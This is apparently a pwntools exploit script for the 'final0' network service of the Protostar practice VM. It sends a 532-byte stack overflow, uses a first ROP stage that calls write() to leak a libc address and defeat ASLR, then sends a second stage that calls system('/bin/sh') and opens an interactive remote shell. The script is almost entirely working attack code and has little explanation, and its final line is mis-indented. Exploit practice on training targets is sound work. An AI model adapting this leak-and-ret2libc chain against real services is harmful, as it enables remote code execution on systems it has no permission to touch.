ASLR remote overflow protostar final0

#!/usr/bin/python
from pwn import *

def main():
    remote_port = 2995
    remote_ip = "192.168.2.115"

    dummy = p32(0xcafebabe)
    offset = 532

    # 08048abc <write@plt>:
    write_plt = p32(0x08048abc)

    # 0804adb8  00000d07 R_386_JUMP_SLOT   00000000   write@GLIBC_2.0
    write_got = p32(0x0804adb8)

    # ROP leak:
    rop_leak = write_plt # write@plt
    rop_leak += dummy # 0xcafebabe
    rop_leak += p32(1) # File descriptor: socket
    rop_leak += write_got # write@got
    rop_leak += p32(4) # Write 4 bytes to socket

    # Craft payload
    payload = "A" * offset
    payload += rop_leak

    # Stage 1: LEAK
    r = remote(remote_ip, remote_port)
    r.sendline(payload) # Send to server

    log.warn("Stage 1: LEAK")
    reply = r.recvall() # Receives only the leaked address
    r.close() # Closes connection to remote server

    print "Leak ADDR : write() [ Little-endian ]"
    print hexdump(reply)

    write_addr = u32(reply)
    log.success("write() : 0x%x" % write_addr)

    # 000bcc70 <__write>:
    write_offset = 0x000bcc70
    libc_base = write_addr - write_offset
    log.success("libc base : 0x%x" % libc_base)

    # 00038fb0 <__libc_system>:
    system_offset = 0x00038fb0
    system_addr = libc_base + system_offset
    log.success("system() : 0x%x" % system_addr)
    system_addr = p32(system_addr)

    #  11f3bf /bin/sh
    bin_sh_offset = 0x11f3bf
    bin_sh = libc_base + bin_sh_offset
    log.success("\'/bin\'/sh : 0x%x" % bin_sh)
    bin_sh = p32(bin_sh)

    # ROP: shell
    rop_shell = system_addr
    rop_shell += p32(0xbadf00d)
    rop_shell += bin_sh

    # Stage 2: shell
    payload = "A" * offset
    payload += rop_shell

    r = remote(remote_ip, remote_port) # Recreates connection
    r.sendline(payload) # Send to server

    log.warn("Stage 2: SHELL")
    log.progress("Executing shell")

    r.interactive() # Pass interaction back to user

if __name__ == "__main__":
main()